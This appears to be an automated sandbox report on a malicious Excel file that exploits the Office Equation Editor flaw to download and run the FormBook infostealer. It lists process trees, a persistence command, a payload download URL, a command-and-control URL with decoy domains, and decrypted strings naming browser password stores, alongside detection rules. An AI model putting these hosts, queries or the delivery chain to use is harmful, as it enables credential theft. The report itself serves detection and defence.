Loading ...

Play interactive tourEdit tour

Analysis Report Order_00009.xlsx

Overview

General Information

Sample Name:Order_00009.xlsx
Analysis ID:339205
MD5:f99314a2a08dbbc7ddff20a83f1a5f32
SHA1:1914f9f5eedef3300ced36713b4bea07597679c4
SHA256:2f3772ae0a61ae1f913ba2e34f97dd86e7c2e619bc839171f8ff67cb06fbb209
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
Binary contains a suspicious time stamp
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2252 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 1692 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2300 cmdline: 'C:\Users\Public\vbc.exe' MD5: 92FF500A693078263908C83B4B290481)
      • schtasks.exe (PID: 2800 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 2824 cmdline: {path} MD5: A8CCD298F718423D35CFD925063F082D)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • wlanext.exe (PID: 3020 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
          • cmd.exe (PID: 3052 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x87e0", "KEY1_OFFSET 0x1c9c8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1ca99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1b4a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "slgacha.com", "oohdough.com", "6983ylc.com", "aykassociate.com", "latin-hotspot.com", "starrockindia.com", "beamsubway.com", "queensboutique1000.com", "madbaddie.com", "bhoomimart.com", "ankitparivar.com", "aldanasanchezmx.com", "citest1597669833.com", "cristianofreitas.com", "myplantus.com", "counterfeitmilk.com", "8xf39.com", "pregnantwomens.com", "yyyut6.com", "stnanguo.com", "fessusesefsee.com", "logansshop.net", "familydalmatianhomes.com", "accessible.legal", "epicmassiveconcepts.com", "indianfactopedia.com", "exit-divorce.com", "colliapse.com", "nosishop.com", "hayat-aljowaily.com", "soundon.events", "previnacovid19-br.com", "traptlongview.com", "splendidhotelspa.com", "masterzushop.com", "ednevents.com", "studentdividers.com", "treningi-enduro.com", "hostingcoaster.com", "gourmetgroceriesfast.com", "thesouthbeachlife.com", "teemergin.com", "fixmygearfast.com", "arb-invest.com", "shemaledreamz.com", "1819apparel.com", "thedigitalsatyam.com", "alparmuhendislik.com", "distinctmusicproductions.com", "procreditexpert.com", "insights4innovation.com", "jzbtl.com", "1033325.com", "sorteocamper.info", "scheherazadelegault.com", "glowportraiture.com", "cleitstaapps.com", "globepublishers.com", "stattests.com", "brainandbodystrengthcoach.com", "magenx2.info", "escaparati.com", "wood-decor24.com", "travelnetafrica.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.herbmedia.net/csv8/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0xa2318:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa26b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157b58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157ef2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xae3c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x163c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xadeb1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x1636f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xae4c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x163d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xae63f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x163e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa30ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x15890a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xad12c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x16296c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa3e42:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x159682:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xb34b7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x168cf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb455a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1692, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2300
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.26.106.165, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1692, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1692, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2300, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp', ProcessId: 2800
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1692, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2300
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1692, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2300
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1692, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2300

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://medicelcoolers.cn/file2.exeAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 7.2.vbc.exe.400000.1.raw.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x87e0", "KEY1_OFFSET 0x1c9c8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1ca99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1b4a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for domain / URLShow sources
          Source: medicelcoolers.cnVirustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: Order_00009.xlsxVirustotal: Detection: 30%Perma Link
          Source: Order_00009.xlsxReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeJoe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000003.2236618146.00000000004A2000.00000004.00000001.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 0027A0C5h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 0027A0C5h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: medicelcoolers.cn
